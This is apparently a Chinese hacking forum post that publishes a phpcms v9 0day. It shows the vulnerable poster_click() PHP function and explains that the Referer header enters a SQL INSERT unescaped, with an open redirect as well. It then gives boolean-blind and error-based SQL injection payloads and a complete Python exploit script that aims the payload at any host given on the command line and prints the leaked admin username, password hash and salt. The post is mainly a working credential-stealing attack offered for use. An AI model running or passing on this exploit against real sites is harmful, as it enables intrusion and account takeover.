有人放出了 phpcms v9 的 0day，就随手写了个利用代码，其中注入代码有两种形式：
问题函数位于 \phpcms\modules\poster\index.php 的 poster_click()：HTTP_REFERER（即请求的 Referer 头）未经任何转义直接拼入点击记录的 INSERT，因此 Referer 头可控即可注入；另外 $_GET['url'] 未经校验直接用于 header('Location: ...')，还存在开放重定向。
/**
 * Log a click on poster $id and redirect the visitor to the poster's link.
 *
 * Reads GET id/siteid/url, the `username` cookie, the client IP and the
 * Referer header; writes one row to the click log, bumps the click counter,
 * then sends a Location header. Returns false when no poster row matches
 * $id; nothing is returned on the success path.
 *
 * SECURITY (the point of this post): the click-log INSERT below receives
 * HTTP_REFERER (presumably $_SERVER['HTTP_REFERER']) verbatim. Nothing in
 * this function escapes it, and the payloads in this post show it reaching
 * the query unescaped, so the Referer header is a SQL injection sink. The
 * same INSERT also takes the cookie-derived $username and the ip()-derived
 * $ip/$area; whether those helpers sanitize is not visible here. Separately,
 * a user-supplied `url` parameter is passed straight to header('Location:')
 * (open redirect).
 */
public function poster_click() {
    // intval() makes id numeric, so this parameter itself is not injectable.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // An unknown id bails out before any write, so an exploit needs a valid poster id.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();                   // client IP; which header(s) ip() trusts is not visible here
    $area = $ip_area->get($ip);
    // Attacker-controlled cookie value; whether get_cookie() escapes it is not shown.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        // siteid is intval()'d as well.
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // SINK: 'referer' => HTTP_REFERER enters the INSERT with no escaping visible.
        // Fix: escape (or bind) the referer value with the DB layer's escaping
        // before calling insert().
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // Open redirect: when the poster has other than exactly one link entry,
        // ?url= is used without validation. Fix: accept only a value matching one
        // of the configured linkurl entries, otherwise fall back to the default.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}
利用方式：
1、可以采用布尔盲注的手法（注入点同样是 Referer 头）：
Referer: 1',(select password from v9_admin where userid=1 and substr(password,4)='xxoo'),'1')#
根据返回页面是否正常，逐位猜解 password 字段的值。
2、报错注入的代码是花开写的，随手附上：
1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
此方法是报错注入（floor(rand(0)*2) 配合 group by 触发主键冲突，错误信息中带出 username_password_encrypt），原理自查。注意：需要目标把 MySQL 错误回显到页面；若 v9_admin 不止一行，内层子查询会报 "Subquery returns more than 1 row"，需加 LIMIT 1。
利用程序（基于上面的报错注入 payload）：
#!/usr/bin/env python
from __future__ import print_function

import re
import sys

try:  # Python 2
    import httplib
except ImportError:  # Python 3
    import http.client as httplib
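def attack(url=None, paths=None):
    """Send the error-based injection payload and print the extracted row.

    The payload travels in the Referer header, which poster_click() writes
    into the click log unescaped; the duplicate-key error MySQL raises then
    echoes ``username_password_encrypt`` from v9_admin back in the response.

    Args:
        url: target host (``host`` or ``host:port``); defaults to argv[1].
        paths: phpcms install prefix such as ``/`` or ``/phpcmsv9/``;
            defaults to argv[2].

    Returns:
        The ``Duplicate entry '...'`` fragment from the response, or None
        when no MySQL error is echoed (error display off, a WAF, or a poster
        id that does not exist so poster_click() returns before the INSERT).
    """
    if url is None:
        url = sys.argv[1]
    if paths is None:
        paths = sys.argv[2]
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    # floor(rand(0)*2) + GROUP BY forces a duplicate-key error whose message
    # carries the concat()'d admin row.
    payload = (
        "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
        "(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin "
        "WHERE 1 ))a from information_schema.tables group by a)b),'1')#"
    )
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
        "Accept": "text/plain",
        "Referer": payload,
    }
    # id must name an existing poster row or nothing is inserted. poster_click()
    # itself reads `siteid`, not `sitespaceid`; the latter is kept only for
    # parity with the original request. rstrip avoids "//index.php" when the
    # prefix already ends with "/".
    request_path = paths.rstrip("/") + "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2"
    conn = httplib.HTTPConnection(url)
    try:
        conn.request("GET", request_path, headers=headers)
        body = conn.getresponse().read()
    finally:
        conn.close()
    # Python 3 returns bytes; decode so the regex works on both interpreters.
    if isinstance(body, bytes):
        body = body.decode("utf-8", "replace")
    match = re.search(r"Duplicate entry '[^']+'", body)
    if match is None:
        print("No MySQL error in the response (error display off, WAF, or wrong poster id).")
        return None
    print(match.group(0))
    return match.group(0)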
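if __name__ == "__main__":
    # Two positional arguments are required: target host and install prefix.
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("  %s www.paxmac.org /" % sys.argv[0])
        print("  %s www.paxmac.org /phpcmsv9/" % sys.argv[0])
        sys.exit(1)
    attack()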